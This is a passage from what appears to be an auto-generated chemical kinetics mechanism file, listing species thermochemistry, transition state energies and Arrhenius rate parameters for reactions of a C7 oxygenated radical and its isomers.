structure = SMILES('C=[C]CC([O])CC'),
E0 = (231.65,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,2950,3100,1380,975,1025,1650,1685,370,1380,1390,370,380,2900,435,2750,2800,2850,1350,1500,750,1050,1375,1000,265.814,265.815,265.815,4000],'cm^-1')),
HinderedRotor(inertia=(0.190146,'amu*angstrom^2'), symmetry=1, barrier=(9.53396,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.378745,'amu*angstrom^2'), symmetry=1, barrier=(18.9903,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.378745,'amu*angstrom^2'), symmetry=1, barrier=(18.9903,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0190333,'amu*angstrom^2'), symmetry=1, barrier=(18.9903,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (98.143,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.778392,0.0678099,-4.94063e-05,1.89879e-08,-3.03905e-12,27979.2,28.7695], Tmin=(100,'K'), Tmax=(1431.91,'K')), NASAPolynomial(coeffs=[12.8122,0.0341938,-1.41917e-05,2.59277e-09,-1.76603e-13,24532.9,-33.6072], Tmin=(1431.91,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(231.65,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(390.78,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C]C(C)C(C)[O](19568)',
structure = SMILES('C=[C]C(C)C(C)[O]'),
E0 = (223.678,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,1685,370,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,180,528.76,546.798],'cm^-1')),
HinderedRotor(inertia=(0.104883,'amu*angstrom^2'), symmetry=1, barrier=(2.41146,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.227495,'amu*angstrom^2'), symmetry=1, barrier=(12.5088,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0637133,'amu*angstrom^2'), symmetry=1, barrier=(12.4928,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0599492,'amu*angstrom^2'), symmetry=1, barrier=(12.5012,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (98.143,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3818.2,'J/mol'), sigma=(6.62498,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=596.39 K, Pc=29.8 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.463893,0.0686477,-4.96367e-05,1.85833e-08,-2.8272e-12,27037.1,29.6678], Tmin=(100,'K'), Tmax=(1539.81,'K')), NASAPolynomial(coeffs=[15.6202,0.0292757,-1.12826e-05,1.97779e-09,-1.31166e-13,22369.5,-49.995], Tmin=(1539.81,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(223.678,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(390.78,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(CC(C)OJ)"""),
)
species(
label = 'C=C([CH]C)C([O])CC(24176)',
structure = SMILES('[CH2]C(=CC)C([O])CC'),
E0 = (93.6706,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.230531,0.0810783,-5.01538e-05,1.00705e-08,1.1291e-12,11428.3,33.4333], Tmin=(100,'K'), Tmax=(1136.76,'K')), NASAPolynomial(coeffs=[17.1455,0.0371582,-1.49247e-05,2.73759e-09,-1.89289e-13,6365.1,-57.5174], Tmin=(1136.76,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(93.6706,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(CC(C)OJ)"""),
)
species(
label = 'C=C(C)[CH]C([O])CC(24959)',
structure = SMILES('C=C(C)[CH]C([O])CC'),
E0 = (71.6698,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.417587,0.0890152,-6.88228e-05,2.75068e-08,-4.47416e-12,8785.44,30.5522], Tmin=(100,'K'), Tmax=(1442.82,'K')), NASAPolynomial(coeffs=[18.1573,0.0375191,-1.52857e-05,2.76956e-09,-1.87891e-13,3425.4,-65.8705], Tmin=(1442.82,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(71.6698,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CC(C)OJ)"""),
)
species(
label = 'C=C1OC(CC)C1C(24923)',
structure = SMILES('C=C1OC(CC)C1C'),
E0 = (-147.193,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.350735,0.0551854,4.85809e-05,-1.13819e-07,5.15709e-11,-17548.6,23.4642], Tmin=(100,'K'), Tmax=(922.673,'K')), NASAPolynomial(coeffs=[22.6806,0.0231271,-4.56127e-06,6.32584e-10,-4.69066e-14,-24425.3,-97.4024], Tmin=(922.673,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-147.193,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(469.768,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsOs) + group(Cds-CdsHH) + ring(2methyleneoxetane)"""),
)
species(
label = 'H2CC(41)',
structure = SMILES('[C]=C'),
E0 = (401.202,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (26.0373,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2480.69,'J/mol'), sigma=(4.48499,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=387.48 K, Pc=62.39 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.28155,0.00697643,-2.38528e-06,-1.21078e-09,9.82042e-13,48319.2,5.92036], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.27807,0.00475623,-1.63007e-06,2.54623e-10,-1.4886e-14,48014,0.639979], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(401.202,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""H2CC""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C[CH]C([O])CC(10592)',
structure = SMILES('C[CH]C([O])CC'),
E0 = (89.7082,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,3025,407.5,1350,352.5,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,435.236,435.26,435.38],'cm^-1')),
HinderedRotor(inertia=(0.000889277,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.000890405,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0567145,'amu*angstrom^2'), symmetry=1, barrier=(7.62767,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0567145,'amu*angstrom^2'), symmetry=1, barrier=(7.62809,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (86.1323,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.17399,0.0529682,-1.85308e-05,-9.37379e-09,6.22763e-12,10899,26.6569], Tmin=(100,'K'), Tmax=(1066.07,'K')), NASAPolynomial(coeffs=[11.8674,0.0306075,-1.206e-05,2.20812e-09,-1.53359e-13,7609.65,-30.3505], Tmin=(1066.07,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(89.7082,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(365.837,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCO) + radical(CC(C)OJ)"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29226.7,5.11107], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29226.7,5.11107], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'C=[C]C(C)[CH]CC(24265)',
structure = SMILES('C=[C]C(C)[CH]CC'),
E0 = (336.549,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (96.1702,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.751194,0.0665364,-3.88394e-05,1.11087e-08,-1.29102e-12,40598.1,31.271], Tmin=(100,'K'), Tmax=(1913.45,'K')), NASAPolynomial(coeffs=[15.9081,0.0348515,-1.40008e-05,2.45473e-09,-1.60346e-13,34797.7,-51.6879], Tmin=(1913.45,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(336.549,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cs_S) + radical(Cds_S)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (199.898,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (342.409,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (310.791,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (351.948,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (298.871,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (326.151,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (212.813,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (243.752,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (382.479,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (365.568,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (314.589,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (341.875,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (351.777,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (275.178,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (275.001,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (258.299,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (244.206,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (258.463,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (249.673,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (235.7,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (494.183,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS22',
E0 = (278.145,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS23',
E0 = (288.866,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS24',
E0 = (651.512,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS25',
E0 = (643.54,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS26',
E0 = (294.372,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS27',
E0 = (344.518,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS28',
E0 = (208.182,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS29',
E0 = (490.91,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS30',
E0 = (579.554,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C2H5CHO(70)', 'CH3CHCCH2(18175)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(3)', 'C=C=C(C)C([O])CC(24948)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(6.51e+07,'cm^3/(mol*s)'), n=1.64, Ea=(11.8407,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 2579 used for Cds-CsCs_Ca;HJ
Exact match found for rate rule [Cds-CsCs_Ca;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['H(3)', 'C=[C]C(C)C(=O)CC(24949)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(0.0366254,'m^3/(mol*s)'), n=1.743, Ea=(71.4418,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsCs_O;YJ] for rate rule [CO-CsCs_O;HJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['H(3)', 'C#CC(C)C([O])CC(24950)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(1.255e+11,'cm^3/(mol*s)'), n=1.005, Ea=(13.1503,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 138 used for Ct-H_Ct-Cs;HJ
Exact match found for rate rule [Ct-H_Ct-Cs;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['CC[CH][O](563)', 'CH3CHCCH2(18175)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(0.00472174,'m^3/(mol*s)'), n=2.41, Ea=(20.1294,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-CsH_Ca;CJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['CH3(17)', 'C=C=CC([O])CC(24951)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(10800,'cm^3/(mol*s)'), n=2.41, Ea=(32.1331,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 597 used for Cds-CsH_Ca;CsJ-HHH
Exact match found for rate rule [Cds-CsH_Ca;CsJ-HHH]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['C2H5CHO(70)', 'C=[C][CH]C(18176)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(0.0201871,'m^3/(mol*s)'), n=2.2105, Ea=(56.0866,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsH_O;YJ] for rate rule [CO-CsH_O;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction8',
reactants = ['C2H5(29)', 'C=[C]C(C)C=O(24541)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(7.94e+10,'cm^3/(mol*s)'), n=0, Ea=(28.0328,'kJ/mol'), T0=(1,'K'), Tmin=(333,'K'), Tmax=(363,'K'), comment="""Estimated using template [CO_O;CsJ-CsHH] for rate rule [CO-CsH_O;CsJ-CsHH]
Euclidian distance = 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction9',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C[C](C)C([O])CC(20837)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(3.677e+10,'s^-1'), n=0.839, Ea=(182.581,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Cd_rad_out_Cd;Cs_H_out_noH] for rate rule [R2H_S;Cd_rad_out_Cd;Cs_H_out_Cs2]
Euclidian distance = 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=[C]C(C)[C](O)CC(24952)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(4.56178e+08,'s^-1'), n=1.25272, Ea=(165.67,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Y_rad_out;Cs_H_out_Cs2] for rate rule [R2H_S;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction11',
reactants = ['[CH]=CC(C)C([O])CC(20846)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(1.08e+06,'s^-1'), n=1.99, Ea=(105.437,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 17 used for R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd
Exact match found for rate rule [R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction12',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=CC(C)[C]([O])CC(20839)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(2.4115e+09,'s^-1'), n=1.00333, Ea=(141.977,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;Cd_rad_out_Cd;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction13',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['[CH2]C(C=C)C([O])CC(20587)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(2.304e+09,'s^-1'), n=1.24, Ea=(151.879,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 204 used for R3H_SS_Cs;Cd_rad_out_Cd;Cs_H_out_2H
Exact match found for rate rule [R3H_SS_Cs;Cd_rad_out_Cd;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=[C][C](C)C(O)CC(24953)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(111914,'s^-1'), n=2.27675, Ea=(75.2806,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;O_rad_out;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction15',
reactants = ['C=[C]C(C)C(O)[CH]C(24954)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(5.71,'s^-1'), n=3.021, Ea=(105.562,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 319 used for R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction16',
reactants = ['[CH2]C([C]=C)C(O)CC(20843)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(8.6e-09,'s^-1'), n=5.55, Ea=(83.68,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 340 used for R4H_SSS;C_rad_out_2H;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_2H;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction17',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=CC(C)C([O])[CH]C(20844)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(74200,'s^-1'), n=2.23, Ea=(44.3086,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H_RSS;Cd_rad_out;Cs_H_out_1H] for rate rule [R4H_SSS;Cd_rad_out_Cd;Cs_H_out_H/NonDeC]
Euclidian distance = 2.44948974278
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction18',
reactants = ['[CH2]CC(O)C(C)[C]=C(24955)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(8.6e-09,'s^-1'), n=5.55, Ea=(83.68,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 340 used for R4H_SSS;C_rad_out_2H;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_2H;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction19',
reactants = ['[CH]=[C]C(C)C(O)CC(24956)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS19',
